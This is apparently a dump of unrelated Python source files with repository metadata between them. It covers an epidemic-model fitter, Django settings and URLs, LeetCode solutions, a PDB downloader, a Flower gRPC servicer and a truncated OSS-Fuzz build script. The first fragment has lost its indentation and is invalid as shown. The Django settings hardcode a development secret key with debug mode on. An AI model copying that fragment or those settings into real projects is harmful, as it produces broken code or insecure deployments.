train_full_set['active'] = train_full_set['cases'] - train_full_set['cases'].shift(14)
train_full_set = train_full_set.dropna(subset=['active'])
train_full_set = train_full_set[[a for a in train_full_set["active"] > self.nmin]]
#for counties
region_pop = population[region]
if train_full_set.shape[0] > self.nmin_train_set and region_pop > 0:
train_full_set = train_full_set.sort_values(self.date)
# if self.region == 'fips':
# try:
# list_1 = []
# for i in range(len(train_full_set)):
# val_1 = train_full_set['active'].values[i]
# val_2 = ((train_full_set['cases'].values[i])*val_1)/train_full_set['cases_state_state'].values[i]
# list_1.append(val_2)
# train_full_set['active'] = list_1
# except:
# pass
full_times = [j for j in range(len(train_full_set))]
full_cases = train_full_set.loc[:, "active"].values
full_dead = train_full_set.loc[:, "deaths"].values
full_recover = train_full_set.loc[:, "cases"].values - train_full_set.loc[:, "active"].values - train_full_set.loc[:, "deaths"].values
train_set, valid_set= np.split(train_full_set, [int(self.train_valid_split *len(train_full_set))])
timer = [j for j in range(len(train_set))]
train_cases = train_set.loc[:, "active"].values
train_cum_cases = train_set.loc[:, "cases"].values
train_dead = train_set.loc[:, "deaths"].values
train_recover = train_set.loc[:, "cases"].values - train_set.loc[:, "active"].values - train_set.loc[:, "deaths"].values
times = timer
valid_times = [j for j in range(len(valid_set))]
valid_cases = valid_set.loc[:, "active"].values
valid_dead = valid_set.loc[:, "deaths"].values
valid_recover = valid_set.loc[:, "cases"].values - valid_set.loc[:, "active"].values - valid_set.loc[:, "deaths"].values
region_pop = population[region]
if sum(train_dead)/sum(train_cases) > 0.01:
weight_dead = sum(train_cases)/sum(train_dead)
else:
weight_dead = 10
if sum(train_recover)/sum(train_cases) > 0.01:
weight_recover = sum(train_cases)/sum(train_recover)
else:
weight_recover = 10
if self.trained_warmstart == None or retrain_warmstart == True:
i_t = train_cum_cases[1:(len(train_cum_cases)-1)] - train_cum_cases[0:(len(train_cum_cases)-2)]
r_t = train_recover[1:(len(train_recover)-1)] - train_recover[0:(len(train_recover)-2)]
d_t = train_dead[1:(len(train_dead)-1)] - train_dead[0:(len(train_dead)-2)]
S_t = np.array(region_pop) - train_cum_cases
#print(i_t)
beta = sum(i_t)/sum(train_cases*S_t/region_pop)
gamma = sum(r_t)/sum(train_cases)
mu = sum(d_t)/sum(train_cases)
region_beta1vals = self.beta1vals.copy()
#region_gammavals = self.gammavals
region_avals = self.avals.copy()
#region_muvals = self.muvals
region_beta2vals = self.beta2vals.copy()
region_pvals = self.pvals.copy()
region_Tvals = self.Tvals.copy()
region_gammavals = [gamma]
region_muvals = [mu]
region_beta1vals.append(beta)
region_beta2vals.append(beta)
#region_gammavals.append(gamma)
#region_muvals.append(mu)
param_list = []
mse_list = []
if self.verbose:
iteration = len(region_beta1vals)*len(region_beta2vals)*len(region_gammavals)*len(region_avals)*len(region_muvals)*len(region_pvals)*len(region_Tvals)
progress_bar = tqdm(range(iteration), desc = str(region))
beta1_progress = range(len(region_beta1vals))
gamma_progress = range(len(region_gammavals))
a_progress = range(len(region_avals))
mu_progress = range(len(region_muvals))
beta2_progress = range(len(region_beta2vals))
p_progress = range(len(region_pvals))
T_progress = range(len(region_Tvals))
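# Grid search over warm-start parameter combinations: each candidate is refined with the
# chosen scipy optimizer on the training split and scored on the validation split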
for beta1index in beta1_progress:
for gammaindex in gamma_progress:
for aindex in a_progress:
for muindex in mu_progress:
for beta2index in beta2_progress:
for pindex in p_progress:
for Tindex in T_progress:
if self.verbose:
progress_bar.update(1)
params = [region_beta1vals[beta1index], region_gammavals[gammaindex], region_pop, region_avals[aindex], region_muvals[muindex], region_beta2vals[beta2index], region_pvals[pindex], region_Tvals[Tindex]]
optimizer = optimize.minimize(NLL, params, args=(train_cases, train_dead, train_recover, self.death_lm, self.recover_lm, weight_dead, weight_recover, times), method=self.optimizer)
params = np.abs(optimizer.x)
ini = inifcn(params, train_cases, train_dead)
param_list.append([region_beta1vals[beta1index],region_gammavals[gammaindex],region_avals[aindex],region_muvals[muindex], region_beta2vals[beta2index], region_pvals[pindex], region_Tvals[Tindex]])
train_est = ode(model, ini, times, args=(params,))
valid_ini = train_est[len(train_est)-1,:]
valid_est = ode(model, valid_ini, valid_times, args=(params,))
active, recovered, dead = finfcn(valid_est)
mse = sqrt(mean_squared_error(valid_cases,active)) + self.death_lm*sqrt(mean_squared_error(valid_dead,dead)) + self.recover_lm*sqrt(mean_squared_error(valid_recover,recovered))
mse_list.append(mse)
minindex = mse_list.index(min(mse_list))
beta1 = param_list[minindex][0]
gamma = param_list[minindex][1]
a = param_list[minindex][2]
mu = param_list[minindex][3]
beta2 = param_list[minindex][4]
p = param_list[minindex][5]
T = param_list[minindex][6]
params = [beta1, gamma, region_pop, a, mu, beta2, p, T]
paramnames = ['beta1', 'gamma', 'pop', 'a', 'mu', 'beta2', 'p', 'T']
warmstart[region] = params
else:
params = self.trained_warmstart[region]
optimizer = optimize.minimize(NLL, params, args=(full_cases, full_dead, full_recover, self.death_lm, self.recover_lm, weight_dead, weight_recover, full_times), method=self.optimizer)
paramests = np.abs(optimizer.x)
iniests = inifcn(paramests, full_cases, full_dead)
xest = ode(model, iniests, full_times, args=(paramests,))
output[region] = [paramests, xest[0,:], xest[len(xest)-1,:], train_full_set.date.iloc[0], train_full_set.date.iloc[len(train_full_set) - 1]]
self.trained_param = output
self.trained_warmstart = warmstart
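    # Note added for clarity (not in the original file): the block above warm-starts
    # each region from closed-form beta/gamma/mu estimates, grid-searches the
    # (beta1, gamma, a, mu, beta2, p, T) candidates (each locally refined by NLL
    # minimization) against validation RMSE, then refits the chosen parameters on
    # the full series and caches them in self.trained_warmstart for reuse.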
def predict(self,
regions,
dates):
results = dict()
for i in range(len(regions)):
region = regions[i]
try:
region_params = self.trained_param[region]
except KeyError:
continue
params = region_params[0]
#print(params)
start_vals = region_params[1]
end_vals = region_params[2]
start_date = region_params[3]
end_date = region_params[4]
insample_dates = []
outsample_dates = []
for d in dates:
if d >= start_date and d <= end_date:
insample_dates.append(d)
elif d >= end_date:
outsample_dates.append(d)
# Calculate training preds
train_pred = pd.DataFrame()
train_dates = pd.DataFrame()
if len(insample_dates) > 0:
tDelta = end_date - start_date
times = [k for k in range(tDelta.days)]
ini = start_vals
paramests = params
res = ode(model, ini, times, args=(paramests,))
active, recovered, dead = finfcn(res)
if self.target == "cases":
train_pred = active + recovered + dead
elif self.target == "active":
train_pred = active
elif self.target == "deaths":
train_pred = dead
train_dates = [start_date + timedelta(days=x) for x in range(tDelta.days)]
# Calculate testing preds
test_pred = pd.DataFrame()
test_dates = pd.DataFrame()
last_date = max(dates)
tDelta = last_date - end_date
times = [k for k in range(tDelta.days + 1)]
ini1 = end_vals
# Simulate the model
res = ode(model, ini1, times, args=(params,))
active, recovered, dead = finfcn(res)
if self.target == "cases":
test_pred = active + recovered + dead
elif self.target == "active":
test_pred = active
elif self.target == "deaths":
test_pred = dead
test_dates = [end_date + timedelta(days=x) for x in range(tDelta.days + 1)]
if len(outsample_dates) > 0 and len(insample_dates) > 0:
df_fin = pd.DataFrame(np.concatenate((train_pred, test_pred)), index=np.concatenate((train_dates, test_dates)))
elif len(insample_dates) > 0:
df_fin = pd.DataFrame(train_pred, index=train_dates)
else:
df_fin = pd.DataFrame(test_pred, index=test_dates)
results[region] = df_fin.loc[list(np.array(dates)[[date >= start_date for date in dates]]), 0]
return results
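# Illustrative call pattern (not part of the original file; the fitted model object
# name below is an assumption, only predict(regions, dates) is defined above):
#
#   preds = fitted_model.predict(regions=['RegionA'], dates=list_of_dates)
#   preds['RegionA']  # pandas Series of predicted cases/active/deaths
#                     # (per self.target), indexed by the requested dates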
| 45.555556
| 253
| 0.495915
|
a78874d1ef795e48f6fa3fc68c594272f2526cb1
| 3,317
|
py
|
Python
|
DRF Doc/PastebinAPI/start_project/settings.py
|
ibnshayed/Python-Programming
|
a5c50b7ced5131b25260f4c3401f98d016ea8355
|
[
"MIT"
] | null | null | null |
DRF Doc/PastebinAPI/start_project/settings.py
|
ibnshayed/Python-Programming
|
a5c50b7ced5131b25260f4c3401f98d016ea8355
|
[
"MIT"
] | null | null | null |
DRF Doc/PastebinAPI/start_project/settings.py
|
ibnshayed/Python-Programming
|
a5c50b7ced5131b25260f4c3401f98d016ea8355
|
[
"MIT"
] | null | null | null |
"""
Django settings for start_project project.
Generated by 'django-admin startproject' using Django 3.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@19g14ap4cj$ng7+7c#!0^ps@%=*957y=ru!%*_6by-#((7z4_'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# 3rd party
'rest_framework',
# local
'snippets.apps.SnippetsConfig',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'start_project.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_DIR / 'templates'],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'start_project.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
REST_FRAMEWORK = {
'DEFAULT_PAGINATION_CLASS': 'rest_framework.pagination.PageNumberPagination',
'PAGE_SIZE': 10
}
| 25.128788
| 91
| 0.696412
|
71a5d310438f696ca0d9bfde5376ce1ceff33406
| 260
|
py
|
Python
|
array/max_product.py
|
elenaborisova/LeetCode-Solutions
|
98376aab7fd150a724e316357ae5ea46988d9eac
|
[
"MIT"
] | null | null | null |
array/max_product.py
|
elenaborisova/LeetCode-Solutions
|
98376aab7fd150a724e316357ae5ea46988d9eac
|
[
"MIT"
] | null | null | null |
array/max_product.py
|
elenaborisova/LeetCode-Solutions
|
98376aab7fd150a724e316357ae5ea46988d9eac
|
[
"MIT"
] | null | null | null |
def max_product(nums):
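    # Comment added for clarity (not in the original file): returns
    # (largest - 1) * (second largest - 1), e.g. [3, 4, 5, 2] -> (5 - 1) * (4 - 1) = 12.
    # Note that nums.pop(...) mutates the caller's list.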
first_num = nums.pop(nums.index(max(nums)))
second_num = max(nums)
result = (first_num - 1) * (second_num - 1)
return result
print(max_product([3, 4, 5, 2]))
print(max_product([1, 5, 4, 5]))
print(max_product([3, 7]))
| 21.666667
| 47
| 0.630769
|
18e9b1d9c77f0ff1bac5307d4c6c9ada00b3705b
| 760
|
py
|
Python
|
Leetcode/Python/_231.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | 1
|
2021-11-28T15:03:32.000Z
|
2021-11-28T15:03:32.000Z
|
Leetcode/Python/_231.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | null | null | null |
Leetcode/Python/_231.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | null | null | null |
import math
class Solution:
def isPowerOfTwo(self, n: int) -> bool:
if n <= 0:
return False
base = math.floor(math.log(n, 2))
return 2**base == n
class Solution:
def isPowerOfTwo(self, n: int) -> bool:
power = 0
num = 2
if n == 1:
return True
elif n == 2:
return True
while num < n:
num *= 2
if num == n:
return True
return False
class Solution:
def isPowerOfTwo(self, n: int) -> bool:
cnt = 0
while n:
if n & 0x1:
cnt += 1
if cnt > 1:
return False
n >>= 1
if cnt == 1:
return True
| 21.111111
| 43
| 0.413158
|
9c45209bd12e975f43545c6e4b429ff7d6ce58e9
| 5,081
|
py
|
Python
|
ramachandran/download.py
|
leimao/Ramachandran
|
8080697cced0b33792493de8d784467734433ca5
|
[
"Apache-2.0"
] | 2
|
2021-02-15T07:11:26.000Z
|
2021-02-23T09:25:54.000Z
|
ramachandran/download.py
|
leimao/Ramachandran
|
8080697cced0b33792493de8d784467734433ca5
|
[
"Apache-2.0"
] | null | null | null |
ramachandran/download.py
|
leimao/Ramachandran
|
8080697cced0b33792493de8d784467734433ca5
|
[
"Apache-2.0"
] | null | null | null |
from typing import List
import os
import requests
import json
import asyncio
import aiohttp
import time
import tqdm
sem = asyncio.Semaphore(20)
def query_x_ray_entries(maximum_resolution: float = 1.5) -> List[str]:
# RCSB search API
# https://search.rcsb.org/redoc/index.html
# https://search.rcsb.org/index.html#search-api
pdb_ids = []
url = "https://search.rcsb.org/rcsbsearch/v1/query"
query = {
"query": {
"type":
"group",
"logical_operator":
"and",
"nodes": [{
"type": "terminal",
"service": "text"
}, {
"type":
"group",
"logical_operator":
"and",
"nodes": [
{
"type": "terminal",
"service": "text",
"parameters": {
"attribute": "exptl.method",
"operator": "exact_match",
"value": "X-RAY DIFFRACTION"
}
},
{
"type": "terminal",
"service": "text",
"parameters": {
"operator": "less_or_equal",
"value": maximum_resolution,
"attribute": "rcsb_entry_info.resolution_combined"
}
},
]
}]
},
"return_type": "entry",
"request_options": {
"return_all_hits": True
}
}
response = requests.post(url, data=json.dumps(query))
response.raise_for_status()
response_status = response.status_code
text_content = response.text
json_data = json.loads(text_content)
for result in json_data["result_set"]:
pdb_ids.append(result["identifier"])
return pdb_ids
async def async_download_pdbx(pdb_id: str, download_dir: str,
session: aiohttp.ClientSession,
sem: asyncio.Semaphore) -> None:
pdb_url = "https://files.rcsb.org/download/{}.cif".format(pdb_id)
pdb_file_path = os.path.join(download_dir, "{}.cif".format(pdb_id))
# This timeout is useless.
# timeout = aiohttp.ClientTimeout(total=30)
# A workaround solution:
# https://stackoverflow.com/a/64686124
# https://github.com/aio-libs/aiohttp/issues/3203
timeout = aiohttp.ClientTimeout(total=None, sock_connect=30, sock_read=30)
async with sem:
async with session.get(pdb_url, timeout=timeout) as response:
if response.status == 200:
content = await response.read()
with open(pdb_file_path, "wb") as fhand:
fhand.write(content)
# print("PDBx {} downloaded.".format(pdb_id))
else:
print("Unable to download PDBx {}!".format(pdb_id))
async def async_download_pdbxs(pdb_ids: str,
download_dir: str,
maximum_num_connections: int = 5) -> None:
if not os.path.exists(download_dir):
os.mkdir(download_dir)
tasks = []
# https://pawelmhm.github.io/asyncio/python/aiohttp/2016/04/22/asyncio-aiohttp.html
sem = asyncio.Semaphore(5)
connector = aiohttp.TCPConnector(limit_per_host=maximum_num_connections)
async with aiohttp.ClientSession(connector=connector) as session:
for pdb_id in pdb_ids:
task = asyncio.create_task(
async_download_pdbx(
pdb_id=pdb_id,
download_dir=download_dir,
session=session,
sem=sem,
))
tasks.append(task)
responses = [
await f
for f in tqdm.tqdm(asyncio.as_completed(tasks), total=len(tasks))
]
# try:
# await asyncio.gather(*tasks)
# except Exception as e:
# print(repr(e))
# No progress bar.
# await asyncio.gather(*tasks)
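# Concurrency note (not in the original file): downloads are throttled in two
# ways: asyncio.Semaphore(5) bounds how many coroutines hold an in-flight request
# at once, and TCPConnector(limit_per_host=maximum_num_connections) caps the open
# sockets to files.rcsb.org.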
def download_x_ray_pdbxs(download_dir: str,
maximum_resolution: float = 1.5) -> None:
print("Querying PDB IDs of maximum resolution {}...".format(
maximum_resolution))
pdb_ids = query_x_ray_entries(maximum_resolution=maximum_resolution)
print("Downloading {} PDBxs...".format(len(pdb_ids)))
time_start = time.time()
# Python 3.7+
# asyncio.run(async_download_pdbs(pdb_ids=pdb_ids, download_dir=download_dir))
# Python 3.5-3.6
loop = asyncio.get_event_loop()
loop.run_until_complete(
async_download_pdbxs(pdb_ids=pdb_ids, download_dir=download_dir))
time_end = time.time()
time_elapsed = time_end - time_start
print("Download Time Elapsed: {:02d}:{:02d}:{:02d}".format(
int(time_elapsed // 3600), int(time_elapsed % 3600 // 60),
int(time_elapsed % 60 // 1)))
| 31.559006
| 87
| 0.535131
|
d8cca4a8bf5d21134640ba9e13f8d2c67fee502c
| 3,996
|
py
|
Python
|
src/py/flwr/server/grpc_server/flower_service_servicer.py
|
sandracl72/flower
|
bb7f6e2e1f52753820784d262618113b4e7ebc42
|
[
"Apache-2.0"
] | null | null | null |
src/py/flwr/server/grpc_server/flower_service_servicer.py
|
sandracl72/flower
|
bb7f6e2e1f52753820784d262618113b4e7ebc42
|
[
"Apache-2.0"
] | null | null | null |
src/py/flwr/server/grpc_server/flower_service_servicer.py
|
sandracl72/flower
|
bb7f6e2e1f52753820784d262618113b4e7ebc42
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Adap GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Servicer for FlowerService.
Relevant knowledge for reading this modules code:
- https://github.com/grpc/grpc/blob/master/doc/statuscodes.md
"""
from typing import Callable, Iterator
import grpc
from ...proto import transport_pb2_grpc
from ...proto.transport_pb2 import ClientMessage, ServerMessage
from ...server.client_manager import ClientManager
from ...server.grpc_server.grpc_bridge import GRPCBridge
from ...server.grpc_server.grpc_client_proxy import GrpcClientProxy
def default_bridge_factory() -> GRPCBridge:
"""Return GRPCBridge instance."""
return GRPCBridge()
def default_grpc_client_factory(cid: str, bridge: GRPCBridge) -> GrpcClientProxy:
"""Return GrpcClientProxy instance."""
return GrpcClientProxy(cid=cid, bridge=bridge)
def register_client(
client_manager: ClientManager,
client: GrpcClientProxy,
context: grpc.ServicerContext,
) -> bool:
"""Try registering GrpcClientProxy with ClientManager."""
is_success = client_manager.register(client)
if is_success:
def rpc_termination_callback() -> None:
client.bridge.close()
client_manager.unregister(client)
context.add_callback(rpc_termination_callback)
return is_success
class FlowerServiceServicer(transport_pb2_grpc.FlowerServiceServicer):
"""FlowerServiceServicer for bi-directional gRPC message stream."""
def __init__(
self,
client_manager: ClientManager,
grpc_bridge_factory: Callable[[], GRPCBridge] = default_bridge_factory,
grpc_client_factory: Callable[
[str, GRPCBridge], GrpcClientProxy
] = default_grpc_client_factory,
) -> None:
self.client_manager: ClientManager = client_manager
self.grpc_bridge_factory = grpc_bridge_factory
self.client_factory = grpc_client_factory
def Join( # pylint: disable=invalid-name
self,
request_iterator: Iterator[ClientMessage],
context: grpc.ServicerContext,
) -> Iterator[ServerMessage]:
"""Method will be invoked by each GrpcClientProxy which participates in
the network.
Protocol:
- The first message is sent from the server to the client
- Both ServerMessage and ClientMessage are message "wrappers"
wrapping the actual message
- The Join method is (pretty much) protocol unaware
"""
peer = context.peer()
bridge = self.grpc_bridge_factory()
client = self.client_factory(peer, bridge)
is_success = register_client(self.client_manager, client, context)
if is_success:
# Get iterators
client_message_iterator = request_iterator
server_message_iterator = bridge.server_message_iterator()
# All messages will be pushed to client bridge directly
while True:
try:
# Get server message from bridge and yield it
server_message = next(server_message_iterator)
yield server_message
# Wait for client message
client_message = next(client_message_iterator)
bridge.set_client_message(client_message)
except StopIteration:
break
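        # Flow note (not part of the original file): the loop above strictly
        # alternates for each registered client: yield one ServerMessage taken
        # from the GRPCBridge, then block on the next ClientMessage and push it
        # back into the bridge, until either iterator raises StopIteration.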
| 36.327273
| 81
| 0.674925
|
cb5be9f023ed5d34046700ec7f33ae62b0db3067
| 741
|
py
|
Python
|
valet/urls.py
|
rayhu-osu/vcube
|
ff1af048adb8a9f1007368150a78b309b4d821af
|
[
"MIT"
] | 1
|
2019-02-20T18:47:04.000Z
|
2019-02-20T18:47:04.000Z
|
valet/urls.py
|
rayhu-osu/vcube
|
ff1af048adb8a9f1007368150a78b309b4d821af
|
[
"MIT"
] | null | null | null |
valet/urls.py
|
rayhu-osu/vcube
|
ff1af048adb8a9f1007368150a78b309b4d821af
|
[
"MIT"
] | null | null | null |
from django.conf.urls import url
from django.conf import settings
from django.conf.urls.static import static
from . import views
app_name = 'valet'
urlpatterns = [
url(r'^(?P<driver_id>[0-9]+)/$', views.index, name='index'),
url(r'^(?P<driver_id>[0-9]+)/availability/$', views.availability, name='availability'),
url(r'^(?P<driver_id>[0-9]+)/order/$', views.order, name='order'),
url(r'^(?P<driver_id>[0-9]+)/order/(?P<store_id>[0-9]+)/$', views.store_detail, name='store_detail'),
url(r'^(?P<driver_id>[0-9]+)/deliver/$', views.deliver, name='deliver'),
url(r'^(?P<driver_id>[0-9]+)/deliver/(?P<consumer_id>[0-9]+)/$', views.deliver_detail, name='deliver_detail'),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
| 43.588235
| 111
| 0.681511
|
f58b6cd057713fa2c1f00fcde0a34c1dc48cf093
| 13,912
|
py
|
Python
|
infra/gcb/build_project.py
|
kerberosmansour/oss-fuzz
|
c9f563c83a83edc817e7e8958477533d5b0b2b80
|
[
"Apache-2.0"
] | 1
|
2020-03-20T04:10:59.000Z
|
2020-03-20T04:10:59.000Z
|
infra/gcb/build_project.py
|
kerberosmansour/oss-fuzz
|
c9f563c83a83edc817e7e8958477533d5b0b2b80
|
[
"Apache-2.0"
] | null | null | null |
infra/gcb/build_project.py
|
kerberosmansour/oss-fuzz
|
c9f563c83a83edc817e7e8958477533d5b0b2b80
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/python2
"""Starts project build on Google Cloud Builder.
Usage: build_project.py <project_dir>
"""
from __future__ import print_function
import datetime
import json
import os
import re
import sys
import yaml
from oauth2client.client import GoogleCredentials
from googleapiclient.discovery import build
import build_lib
FUZZING_BUILD_TAG = 'fuzzing'
GCB_LOGS_BUCKET = 'oss-fuzz-gcb-logs'
CONFIGURATIONS = {
'sanitizer-address': ['SANITIZER=address'],
'sanitizer-dataflow': ['SANITIZER=dataflow'],
'sanitizer-memory': ['SANITIZER=memory'],
'sanitizer-undefined': ['SANITIZER=undefined'],
'engine-libfuzzer': ['FUZZING_ENGINE=libfuzzer'],
'engine-afl': ['FUZZING_ENGINE=afl'],
'engine-honggfuzz': ['FUZZING_ENGINE=honggfuzz'],
'engine-dataflow': ['FUZZING_ENGINE=dataflow'],
'engine-none': ['FUZZING_ENGINE=none'],
}
DEFAULT_ARCHITECTURES = ['x86_64']
DEFAULT_ENGINES = ['libfuzzer', 'afl', 'honggfuzz']
DEFAULT_SANITIZERS = ['address', 'undefined']
LATEST_VERSION_FILENAME = 'latest.version'
LATEST_VERSION_CONTENT_TYPE = 'text/plain'
def usage():
sys.stderr.write('Usage: ' + sys.argv[0] + ' <project_dir>\n')
exit(1)
def load_project_yaml(project_dir):
project_name = os.path.basename(project_dir)
project_yaml_path = os.path.join(project_dir, 'project.yaml')
with open(project_yaml_path) as f:
project_yaml = yaml.safe_load(f)
project_yaml.setdefault('disabled', False)
project_yaml.setdefault('name', project_name)
project_yaml.setdefault('image', 'gcr.io/oss-fuzz/' + project_name)
project_yaml.setdefault('architectures', DEFAULT_ARCHITECTURES)
project_yaml.setdefault('sanitizers', DEFAULT_SANITIZERS)
project_yaml.setdefault('fuzzing_engines', DEFAULT_ENGINES)
project_yaml.setdefault('run_tests', True)
project_yaml.setdefault('coverage_extra_args', '')
project_yaml.setdefault('labels', {})
return project_yaml
def is_supported_configuration(fuzzing_engine, sanitizer, architecture):
fuzzing_engine_info = build_lib.ENGINE_INFO[fuzzing_engine]
if architecture == 'i386' and sanitizer != 'address':
return False
return (sanitizer in fuzzing_engine_info.supported_sanitizers and
architecture in fuzzing_engine_info.supported_architectures)
def get_sanitizers(project_yaml):
sanitizers = project_yaml['sanitizers']
assert isinstance(sanitizers, list)
processed_sanitizers = []
for sanitizer in sanitizers:
if isinstance(sanitizer, basestring):
processed_sanitizers.append(sanitizer)
elif isinstance(sanitizer, dict):
for key in sanitizer.iterkeys():
processed_sanitizers.append(key)
return processed_sanitizers
def workdir_from_dockerfile(dockerfile):
"""Parse WORKDIR from the Dockerfile."""
WORKDIR_REGEX = re.compile(r'\s*WORKDIR\s*([^\s]+)')
with open(dockerfile) as f:
lines = f.readlines()
for line in lines:
match = re.match(WORKDIR_REGEX, line)
if match:
      # We need to escape '$' since they're used for substitutions in Container
      # Builder builds.
return match.group(1).replace('$', '$$')
return None
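# Illustrative behaviour of workdir_from_dockerfile (not in the original file):
#   'WORKDIR /src/project'  -> '/src/project'
#   'WORKDIR $SRC/project'  -> '$$SRC/project'   ('$' escaped for Container Builder)
#   no WORKDIR directive    -> None (the caller then falls back to '/src')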
def get_build_steps(project_dir):
project_yaml = load_project_yaml(project_dir)
dockerfile_path = os.path.join(project_dir, 'Dockerfile')
name = project_yaml['name']
image = project_yaml['image']
run_tests = project_yaml['run_tests']
ts = datetime.datetime.now().strftime('%Y%m%d%H%M')
build_steps = [
{
'args': [
'clone',
'https://github.com/google/oss-fuzz.git',
],
'name': 'gcr.io/cloud-builders/git',
},
{
'name': 'gcr.io/cloud-builders/docker',
'args': [
'build',
'-t',
image,
'.',
],
'dir': 'oss-fuzz/projects/' + name,
},
{
'name': image,
'args': [
'bash', '-c',
'srcmap > /workspace/srcmap.json && cat /workspace/srcmap.json'
],
'env': ['OSSFUZZ_REVISION=$REVISION_ID'],
},
{
'name': 'gcr.io/oss-fuzz-base/msan-builder',
'args': [
'bash',
'-c',
'cp -r /msan /workspace',
],
},
]
for fuzzing_engine in project_yaml['fuzzing_engines']:
for sanitizer in get_sanitizers(project_yaml):
for architecture in project_yaml['architectures']:
if not is_supported_configuration(fuzzing_engine, sanitizer,
architecture):
continue
env = CONFIGURATIONS['engine-' + fuzzing_engine][:]
env.extend(CONFIGURATIONS['sanitizer-' + sanitizer])
out = '/workspace/out/' + sanitizer
stamped_name = '-'.join([name, sanitizer, ts])
latest_version_file = '-'.join(
[name, sanitizer, LATEST_VERSION_FILENAME])
zip_file = stamped_name + '.zip'
stamped_srcmap_file = stamped_name + '.srcmap.json'
bucket = build_lib.ENGINE_INFO[fuzzing_engine].upload_bucket
if architecture != 'x86_64':
bucket += '-' + architecture
upload_url = build_lib.get_signed_url(
build_lib.GCS_UPLOAD_URL_FORMAT.format(bucket, name, zip_file))
srcmap_url = build_lib.get_signed_url(
build_lib.GCS_UPLOAD_URL_FORMAT.format(bucket, name,
stamped_srcmap_file))
latest_version_url = build_lib.GCS_UPLOAD_URL_FORMAT.format(
bucket, name, latest_version_file)
latest_version_url = build_lib.get_signed_url(
latest_version_url, content_type=LATEST_VERSION_CONTENT_TYPE)
targets_list_filename = build_lib.get_targets_list_filename(sanitizer)
targets_list_url = build_lib.get_signed_url(
build_lib.get_targets_list_url(bucket, name, sanitizer))
env.append('OUT=' + out)
env.append('MSAN_LIBS_PATH=/workspace/msan')
env.append('ARCHITECTURE=' + architecture)
workdir = workdir_from_dockerfile(dockerfile_path)
if not workdir:
workdir = '/src'
failure_msg = ('*' * 80 + '\nFailed to build.\nTo reproduce, run:\n'
'python infra/helper.py build_image {name}\n'
'python infra/helper.py build_fuzzers --sanitizer '
'{sanitizer} --engine {engine} --architecture '
'{architecture} {name}\n' + '*' * 80).format(
name=name,
sanitizer=sanitizer,
engine=fuzzing_engine,
architecture=architecture)
build_steps.append(
# compile
{
'name':
image,
'env':
env,
'args': [
'bash',
'-c',
# Remove /out to break loudly when a build script
# incorrectly uses /out instead of $OUT.
# `cd /src && cd {workdir}` (where {workdir} is parsed from
# the Dockerfile). Container Builder overrides our workdir
# so we need to add this step to set it back.
('rm -r /out && cd /src && cd {workdir} && mkdir -p {out} '
'&& compile || (echo "{failure_msg}" && false)'
).format(workdir=workdir, out=out, failure_msg=failure_msg),
],
})
if sanitizer == 'memory':
# Patch dynamic libraries to use instrumented ones.
build_steps.append({
'name':
'gcr.io/oss-fuzz-base/msan-builder',
'args': [
'bash',
'-c',
# TODO(ochang): Replace with just patch_build.py once
# permission in image is fixed.
'python /usr/local/bin/patch_build.py {0}'.format(out),
],
})
if run_tests:
failure_msg = ('*' * 80 + '\nBuild checks failed.\n'
'To reproduce, run:\n'
'python infra/helper.py build_image {name}\n'
'python infra/helper.py build_fuzzers --sanitizer '
'{sanitizer} --engine {engine} --architecture '
'{architecture} {name}\n'
